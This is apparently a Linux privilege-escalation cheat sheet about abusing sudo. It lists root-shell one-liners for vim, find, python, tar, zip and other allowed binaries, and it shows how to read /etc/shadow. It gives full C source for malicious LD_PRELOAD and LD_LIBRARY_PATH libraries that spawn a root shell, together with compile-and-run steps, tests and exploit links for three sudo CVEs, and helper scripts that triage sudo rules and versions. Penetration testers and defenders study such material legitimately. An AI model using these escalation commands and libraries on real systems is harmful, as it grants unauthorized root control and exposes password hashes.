
Check Sudo Permissions

sudo -l
Look for:
  • NOPASSWD — no password required
  • (ALL) or (root) — the command runs as root; (ALL, !root) means any user except root (see CVE-2019-14287 below)
  • Specific binaries — check GTFOBins; the basename of each allowed command is the lookup key
  • Matching Defaults: env_keep of LD_PRELOAD or LD_LIBRARY_PATH, pwfeedback, setenv or !env_reset (see the LD_PRELOAD, LD_LIBRARY_PATH and CVE sections below)
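Reading sudo -l by eye is error-prone on hosts with many rules, so here is an added shell example (not from the original page) that does the triage above automatically. The sudo -l text it parses is a constructed sample, not output from a real host; the GTFOBins links assume the site's per-binary page layout https://gtfobins.github.io/gtfobins/NAME/ with a #sudo anchor.

```sh
#!/bin/sh
# Added example: triage "sudo -l" output without reading it by eye.
# SAMPLE_SUDO_L is a constructed sample, not output from a real host.
SAMPLE_SUDO_L='Matching Defaults entries for alice on web01:
    env_reset, mail_badpass, env_keep+="LD_PRELOAD", pwfeedback,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User alice may run the following commands on web01:
    (ALL) NOPASSWD: /usr/bin/find
    (root) /usr/bin/vim
    (www-data) NOPASSWD: /usr/sbin/apache2
    (ALL, !root) NOPASSWD: /bin/bash'

# Defaults options worth a second look: env_keep of the LD_* variables,
# pwfeedback (CVE-2019-18634), and setenv / !env_reset (caller controls the
# environment). Prints each matching option on its own line.
sudo_l_dangerous_defaults() {
    printf '%s\n' "$1" | awk '
        /^Matching Defaults/ { in_def = 1; next }
        /^[ \t]*$/ || /^User / { in_def = 0 }
        in_def {
            n = split($0, opt, ",")
            for (i = 1; i <= n; i++) {
                o = opt[i]
                gsub(/^[ \t]+|[ \t]+$/, "", o)
                if (o ~ /^env_keep[+]?=.*LD_(PRELOAD|LIBRARY_PATH)/ ||
                    o == "pwfeedback" || o == "!env_reset" || o == "setenv")
                    print o
            }
        }'
}

# Parse the "may run the following commands" block into one record per rule:
#   runas=<spec> tags=<NOPASSWD,...|-> notes=<assessment|-> cmd=<command>
sudo_l_commands() {
    printf '%s\n' "$1" | awk '
        /^User .* may run the following commands/ { in_cmds = 1; next }
        in_cmds && /^[ \t]*\(/ {
            line = $0
            sub(/^[ \t]+/, "", line)
            # Runas spec is the parenthesised prefix, e.g. "(ALL, !root)" or "(root)".
            p = index(line, ")")
            runas = substr(line, 2, p - 2)
            gsub(/[ \t]/, "", runas)
            rest = substr(line, p + 1)
            sub(/^[ \t]+/, "", rest)
            # Tags are upper-case words followed by a colon, before the command.
            tags = ""
            while (match(rest, /^[A-Z]+:[ \t]*/)) {
                tag = substr(rest, 1, RLENGTH)
                gsub(/[^A-Z]/, "", tag)
                tags = (tags == "") ? tag : tags "," tag
                rest = substr(rest, RLENGTH + 1)
            }
            # Assessment: who the command runs as, and whether a password is asked.
            user = runas
            sub(/:.*/, "", user)          # drop the ":group" half of "user:group"
            notes = ""
            if (user ~ /!root/) notes = "not-root(CVE-2019-14287)"
            else if (user == "ALL" || user == "root") notes = "root"
            if (tags ~ /NOPASSWD/) notes = (notes == "") ? "nopasswd" : notes ",nopasswd"
            if (tags == "") tags = "-"
            if (notes == "") notes = "-"
            printf "runas=%s tags=%s notes=%s cmd=%s\n", runas, tags, notes, rest
        }'
}

# One GTFOBins URL per allowed command, keyed by the command basename.
gtfobins_links() {
    sudo_l_commands "$1" | sed -n 's/.* cmd=\([^ ]*\).*/\1/p' | while read -r cmd; do
        name=${cmd##*/}
        printf '%s https://gtfobins.github.io/gtfobins/%s/#sudo\n' "$name" "$name"
    done
}

# Demo on the constructed sample. Live use:
#   out=$(sudo -l 2>/dev/null); sudo_l_dangerous_defaults "$out"; sudo_l_commands "$out"
sudo_l_dangerous_defaults "$SAMPLE_SUDO_L"
sudo_l_commands "$SAMPLE_SUDO_L"
gtfobins_links "$SAMPLE_SUDO_L"
```

The notes column is the part to act on: root plus nopasswd is an immediate GTFOBins lookup, not-root marks the rule shape CVE-2019-14287 needs, and a non-root runas user (www-data above) is still worth a look for lateral movement.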

GTFOBins — Sudo

https://gtfobins.github.io/#+sudo

Common Entries

vim

sudo vim -c ':!/bin/bash'

find

sudo find . -exec /bin/bash \; -quit
(-quit stops after the first match; without it, and with / as the start path, find spawns a new shell for every path once you exit the previous one.)

python

sudo python3 -c 'import os; os.system("/bin/bash")'

perl

sudo perl -e 'exec "/bin/bash";'

less

sudo less /etc/shadow
!/bin/bash

awk

sudo awk 'BEGIN {system("/bin/bash")}'

nmap

sudo nmap --interactive
!sh
(--interactive only exists in nmap 2.02 to 5.21; on newer versions put os.execute("/bin/sh") in a Lua file and run it with --script instead.)

env

sudo env /bin/bash

tar

sudo tar cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
(The archived file only has to exist; /dev/null avoids creating one. The checkpoint action fires after the first record is written.)

zip

sudo zip /tmp/a.zip /etc/hosts -T --unzip-command="sh -c /bin/bash"
(The file being zipped must exist; -T makes zip test the archive with the command given by --unzip-command, which is where the shell comes from.)

man

sudo man man
!/bin/bash

apache2

sudo apache2 -f /etc/shadow
Leaks first line of file in error output.

LD_PRELOAD

If sudo -l shows env_keep+=LD_PRELOAD under Matching Defaults, sudo passes the variable through to the command it runs as root. The loader honours it there because the target already runs with uid = euid = 0 (LD_PRELOAD is only ignored across a setuid transition), so any allowed command that is dynamically linked will do.

Malicious Shared Library

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* Runs when the loader maps the library, before the target's main().
   Compiled with -nostartfiles so this _init replaces the default one. */
void _init() {
    unsetenv("LD_PRELOAD");   /* otherwise every child of our shell preloads us again */
    setresuid(0, 0, 0);       /* real, effective and saved uid all root */
    system("/bin/bash -p");
}
Compile:
gcc -fPIC -shared -nostartfiles -o /tmp/preload.so preload.c
Execute with any allowed sudo command (sudo accepts VAR=value on the command line when VAR passes env_keep):
sudo LD_PRELOAD=/tmp/preload.so /usr/bin/any_allowed_binary

LD_LIBRARY_PATH

If env_keep+=LD_LIBRARY_PATH: the loader searches the listed directories before the system ones, so a library with the same file name as one the allowed binary needs gets loaded from there instead. Pick a name from the ldd output (one that is not found via the binary's RPATH/RUNPATH, which take precedence).

Find Shared Libraries

ldd /usr/bin/allowed_binary

Hijack Library

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Constructor: runs at load time, before the program calls anything in the library. */
static void hijack() __attribute__((constructor));

void hijack() {
    unsetenv("LD_LIBRARY_PATH");   /* keep our own shell's children from being hijacked */
    setresuid(0, 0, 0);
    system("/bin/bash -p");
}
Build it under the exact file name of a library from the ldd output (a file called libhijack.so would never be looked up):
gcc -shared -fPIC -o /tmp/libNAME.so.N hijack.c
sudo LD_LIBRARY_PATH=/tmp /usr/bin/allowed_binary
Caveat: the fake library exports none of the real symbols. With lazy binding that is fine because the constructor runs first; a binary linked with -z now (full RELRO) resolves every symbol before running constructors and aborts with a symbol lookup error, so on hardened builds choose a library whose symbols are all resolved lazily or export stubs for them.

Sudo CVEs

CVE-2021-3156 — Baron Samedit (sudo 1.8.2 to 1.8.31p2 and 1.9.0 to 1.9.5p1; fixed in 1.9.5p2)

Heap buffer overflow in sudo's argument escaping. Any local user → root, no sudoers entry needed. Check version (distributions backport the fix without changing the version string, so always run the test as well):
sudo -V | head -1
Check vulnerable:
sudoedit -s /
Vulnerable: "sudoedit: /: not a regular file". Patched: the usage message. The crash test from the advisory:
sudoedit -s '\' $(python3 -c 'print("A"*65536)')
If segfault → vulnerable. Exploits:
https://github.com/blasty/CVE-2021-3156
https://github.com/worawit/CVE-2021-3156

CVE-2019-14287 — Sudo runas bypass (sudo < 1.8.28)

If sudoers has (ALL, !root) NOPASSWD: /bin/bash, you may run the command as any user except root:
sudo -u#-1 /bin/bash
sudo -u#4294967295 /bin/bash
The uid -1 (or its unsigned form 4294967295) is not 0, so the !root exclusion does not match, but setresuid() treats -1 as "leave unchanged" and sudo is already root, so the shell runs as root.

CVE-2019-18634 — Sudo pwfeedback (sudo < 1.8.31)

Stack buffer overflow in the password prompt, reachable by any local user, but only if pwfeedback (asterisks while typing the password) is enabled; sudo -l lists it under Matching Defaults. Check:
perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S -k id
"Password: Segmentation fault" → vulnerable; "Password: Sorry, try again" → patched or pwfeedback not enabled.
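To turn the version checks above into something repeatable across many hosts, here is an added shell example (not from the original page) that maps the first line of sudo -V to the three CVEs in this section. The affected ranges are taken from the sudo advisories: 1.8.2 to 1.8.31p2 and 1.9.0 to 1.9.5p1 for CVE-2021-3156, everything below 1.8.28 for CVE-2019-14287, and 1.7.1 up to but not including 1.8.31 for CVE-2019-18634. The version string it is run on is a fixed example, not output from a real host.

```sh
#!/bin/sh
# Added example: map a sudo version string to the CVEs on this page.
# Affected ranges per the sudo advisories:
#   CVE-2021-3156  1.8.2 .. 1.8.31p2 and 1.9.0 .. 1.9.5p1 (fixed in 1.9.5p2)
#   CVE-2019-14287 below 1.8.28 (a "(ALL, !root)"-style rule is also needed)
#   CVE-2019-18634 1.7.1 up to but not including 1.8.31, only with pwfeedback

# Turn "1.8.31p2" into one sortable integer: 1 008 031 002.
# The p-level (patch release) is the least significant part; absent means 0.
sudo_version_key() {
    printf '%s\n' "$1" | awk -F'[.p]' '{
        printf "%d\n", $1 * 1000000000 + $2 * 1000000 + $3 * 1000 + $4
    }'
}

# True when version $2 lies in the inclusive range $1 .. $3.
sudo_version_between() {
    k=$(sudo_version_key "$2")
    [ "$k" -ge "$(sudo_version_key "$1")" ] && [ "$k" -le "$(sudo_version_key "$3")" ]
}

# Print the candidate CVEs for a version, one per line. Accepts either the
# first line of "sudo -V" ("Sudo version 1.8.31") or a bare "1.8.31".
sudo_cve_candidates() {
    ver=$(printf '%s\n' "$1" | sed 's/^[Ss]udo version //')
    k=$(sudo_version_key "$ver")
    if sudo_version_between 1.8.2 "$ver" 1.8.31p2 || sudo_version_between 1.9.0 "$ver" 1.9.5p1; then
        echo "CVE-2021-3156 Baron Samedit: heap overflow, any local user, confirm with: sudoedit -s /"
    fi
    if [ "$k" -lt "$(sudo_version_key 1.8.28)" ]; then
        echo "CVE-2019-14287 runas bypass: needs an (ALL, !root) rule, then sudo -u#-1"
    fi
    if [ "$k" -ge "$(sudo_version_key 1.7.1)" ] && [ "$k" -lt "$(sudo_version_key 1.8.31)" ]; then
        echo "CVE-2019-18634 pwfeedback overflow: only if pwfeedback is enabled in sudoers"
    fi
}

# Demo on a fixed string. Live use: sudo_cve_candidates "$(sudo -V | head -1)"
sudo_cve_candidates "Sudo version 1.8.31"
```

Treat the output as a list of things to test, not a verdict: Debian and Ubuntu ship fixes as 1.8.31-1ubuntu1.2 style package revisions without bumping the upstream version, so a version inside a range still needs the sudoedit -s / or pwfeedback checks above before you spend time on an exploit.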

Sudo Shell Escape Sequences

Some programs allow a shell escape from inside the program:

Program     Escape
vi/vim      :!bash
less        !bash
more        !bash
man         !bash    (via the pager, usually less)
ftp         !bash
gdb         !bash
nmap        !sh      (interactive mode, old versions only)